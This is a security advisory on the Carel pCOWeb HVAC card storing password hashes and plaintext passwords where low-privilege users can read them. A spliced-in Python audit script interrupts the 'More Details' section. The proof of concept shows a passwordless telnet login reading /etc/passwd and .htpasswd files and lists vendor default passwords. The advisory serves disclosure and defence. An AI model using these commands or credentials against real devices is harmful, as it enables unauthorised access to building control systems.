Advisory: Unsafe Storage of Credentials in Carel pCOWeb HVAC

The Carel pCOWeb card stores password hashes in the file "/etc/passwd",
allowing privilege escalation by authenticated users. Additionally,
plaintext copies of the passwords are stored.

Details
=======

Product: HVAC units using the OEM Carel pCOWeb Ethernet Control Interface
Affected Versions: "A 1.4.11 - B 1.4.2", possibly others
Fixed Versions: product obsolete
Vulnerability Type: Credential Disclosure / Privilege Escalation
Security Risk: low
Vendor URL: https://www.carel.com/product/pcoweb-card
Vendor Status: notified / product obsolete
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2019-13
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH

Introduction
============

"The pCOWeb card is used to interface the pCO Sistema to networks that use
the HVAC protocols based on the Ethernet physical standard, such as BACnet
IP, Modbus TCP/IP and SNMP. The card also features an integrated Web-Server,
which both contains the HTML pages relating to the specific application and
allows a browser to be used for remote system management."

(from the vendor's homepage)

It is used as an OEM module in several different HVAC systems and is
considered obsolete by the vendor.

More Details
============

The Carel pCOWeb interface provides user accounts with different levels of
privileges. Despite the different privileges, other users, even the user
"nobody", are able to read the file "/etc/passwd", which contains the hashed
passwords for all user accounts, including those with more privileges.
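One way a defender can check a device backup or firmware image for the two storage problems this advisory describes, as an added example that is not part of the original advisory or of the vendor's code: the script below parses a copy of the passwd file and of the plaintext password file and flags password hashes kept in a world-readable passwd file instead of a shadow file, empty password fields that permit login without a password, legacy 13-character DES crypt hashes, and plaintext entries that still hold a documented vendor default. The sample file contents are constructed from the output quoted in this advisory, and the file mode is passed in as a parameter rather than read from disk, so the check runs offline against copies.

```python
"""Offline audit of pCOWeb-style credential storage (added example, not vendor code).

Runs against *copies* of the files (for instance pulled from a device backup),
so nothing here talks to a device.  Sample contents are constructed from the
output quoted in the advisory.
"""
from __future__ import annotations

import stat
from dataclasses import dataclass

# Constructed sample: /etc/passwd as shown in the advisory.
SAMPLE_PASSWD = """\
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash
"""

# Constructed sample: /usr/local/root/flash/etc/sysconfig/userspwd as shown
# in the advisory (every line is a plaintext password).
SAMPLE_USERSPWD = """\
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel
"""

# Vendor default passwords named in the advisory (both spellings of the
# httpadmin default that appear on the page are included).
DEFAULT_PASSWORDS = frozenset(
    {"froot", "fhttpadm", "fhttpadmin", "fcarel", "fguest", "fadmin", "freserve"}
)

# Password-field values that mean "hash is in /etc/shadow" or "account locked".
LOCKED_OR_SHADOWED = {"x", "*", "!", "!!"}


@dataclass(frozen=True)
class Finding:
    account: str
    issue: str


def audit_passwd(text: str, mode: int = 0o644) -> list[Finding]:
    """Flag weaknesses in a passwd file.  `mode` is the file's permission bits
    (default: the -rw-r--r-- seen on the device), passed in so the check can
    run on a copy without touching the original file."""
    findings: list[Finding] = []
    world_readable = bool(mode & stat.S_IROTH)
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line, "malformed passwd entry"))
            continue
        user, pw = fields[0], fields[1]
        if pw == "":
            findings.append(Finding(user, "empty password field: login without a password"))
        elif pw in LOCKED_OR_SHADOWED or pw.startswith("!"):
            continue  # hash lives in /etc/shadow, or the account is locked
        else:
            if world_readable:
                findings.append(Finding(user, "password hash stored in world-readable passwd file"))
            if "$" not in pw and len(pw) == 13:
                findings.append(Finding(user, "legacy DES crypt hash (truncates passwords to 8 characters)"))
    return findings


def audit_userspwd(text: str, defaults: frozenset[str] = DEFAULT_PASSWORDS) -> list[Finding]:
    """Every KEY=value line in this file is a plaintext password; also flag
    values that are still a documented vendor default."""
    findings: list[Finding] = []
    for line in text.splitlines():
        if "=" not in line or line.lstrip().startswith("#"):
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        findings.append(Finding(key, "password stored in plaintext"))
        if value in defaults:
            findings.append(Finding(key, "vendor default password still in use"))
    return findings


def report(findings: list[Finding]) -> list[str]:
    """One human-readable line per finding, in input order so runs can be diffed."""
    return [f"{f.account}: {f.issue}" for f in findings]


if __name__ == "__main__":
    for line in report(audit_passwd(SAMPLE_PASSWD) + audit_userspwd(SAMPLE_USERSPWD)):
        print(line)
```

The passwd check deliberately treats a shadowed or locked entry ("x", "*", "!") as fine and only reports real hashes; on the advisory's sample it reports the four hashed accounts twice (world-readable file, DES format) and the two passwordless ones ("http", "nobody") once. Passing the real mode of the file (for example from `os.stat` on the copy, or the mode recorded in the backup) instead of the default makes the world-readable finding accurate for the system under review.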
Additionally, a plaintext copy of all passwords is stored in the file
/usr/local/root/flash/etc/sysconfig/userspwd, which is accessible from the
web interface at the URL

http://192.168.0.1/config/pw_changeusers.html

This allows attackers with knowledge of one user account's password to learn
the passwords of the other accounts, possibly gaining more privileges.

Proof of Concept
================

Apart from a web interface, the Carel pCOWeb card provides a telnet interface
accessible using a variety of default passwords and, in some cases, the user
"nobody" without a password:

------------------------------------------------------------------------
$ telnet 192.168.0.1
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

Linux 2.4.21-rmk1 (pCOWeb) (ttya0)

pCOWeb login: nobody
No directory /var/lib/nobody!
Logging in with home = "/".
Executing profile
/usr/local/bin:/bin:/usr/bin
[nobody@pCOWeb13:58:55 /]$ ls -la /etc/passwd
-rw-r--r-- 1 root root 317 Jan 1 00:00 /etc/passwd
[nobody@pCOWeb13:59:00 /]$ cat /etc/passwd
root:o4jAwxNRjdSSk:0:0:root:/root:/bin/bash
http::48:48:HTTP users:/usr/http/root:/bin/bash
nobody::99:99:nobody:/var/lib/nobody:/bin/bash
httpadmin:p4erNF6yyLx0U:200:200:httpadmin:/usr/local/root/http:/bin/bash
carel:f4msfA.Ljf2Fo:500:500:carel:/home:/bin/bash
guest:d4iIyYc5JrnxM:502:101:guest:/usr/bin:/bin/bash
[nobody@pCOWeb13:59:32 /]$ cat /usr/local/root/admin/.htpasswd
admin:7c3fxxrcHcwtc
[nobody@pCOWeb13:59:33 /]$
------------------------------------------------------------------------

The following table lists the cleartext passwords for the above password
hashes:

username  | password
----------------------
root      | froot
httpadmin | fhttpadm
carel     | fcarel
guest     | fguest
nobody    | (none)
admin     | fadmin

The passwords for the user accounts "root", "httpadmin", "carel" and "guest"
are documented in section 9.7.2 of the user manual [0], warning users: "it is
important to set a password other than the default "froot" to prevent
potentially dangerous outside access." It is possible that these default
credentials are covered in CVE-2019-13553. Depending on firmware version
and/or OEM modifications, some versions additionally allow Telnet login
without a password with the username "nobody", while it is disabled for
other versions.

The password for the web interface user "admin" is documented in section
9.2.1 of the user manual [0]. Additionally, some versions were seen with
additional user credentials stored in the directory provided for OEM
modifications of the web interface, such as the username "reserved" with the
password "freserve" in "/usr/local/root/flash/http/reserved/.htpasswd".
Storing some of these passwords in plaintext is covered in CVE-2019-11369.

However, while the above passwords are stored in hashed form, the web
interface at http://192.168.0.1/config/pw_changeusers.html shows them in
plaintext. A file containing the plaintext passwords can be found in the
filesystem:

------------------------------------------------------------------------
[root@pCOWeb14:02:14 /]# cat /usr/local/root/flash/etc/sysconfig/userspwd
PROOT=froot
PHTTP=fhttpadmin
PGUEST=fguest
PCAREL=fcarel
------------------------------------------------------------------------

Workaround
==========

Change all default passwords listed above and ensure the user "nobody" is
disabled or has a password set. The Carel pCOWeb card should not be
connected to networks accessible by untrusted users (compare advisory
rt-sa-2019-014 [1]).

Fix
===

No updated firmware will be published for pCOWeb cards, as they have been
obsolete since Dec 2017. A successor hardware with current firmware is
available for OEM integrators.

Security Risk
=============

Attackers with knowledge of one set of user credentials to a Carel pCOWeb
card could use the password hashes accessible to all users in "/etc/passwd"
or the plaintext copies of the passwords to gain different privileges.
Due to the necessity of access to credentials, this is considered to pose a
low risk only.

Timeline
========

2019-07-17 Vulnerability identified
2019-08-03 Customer approved disclosure to vendor
2019-09-02 Vendor notified
2019-09-09 Vendor did not respond as promised
2019-09-17 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-09-18 Vendor could not be reached
2019-10-28 Advisory published due to publication of CVE-2019-13553

References
==========

[0] https://www.carel.com/documents/10191/0/+030220471/9619472f-f1c0-4ec9-a151-120aaa5e479a?version=1.0
[1] https://www.redteam-pentesting.de/de/advisories/rt-sa-2019-014.txt

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of
specialised IT-security experts. Hereby, security weaknesses in company
networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public security
advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in
Aachen, Germany. If you are interested please visit:
https://www.redteam-pentesting.de/jobs/

--
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                              https://www.redteam-pentesting.de
Germany                                   Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen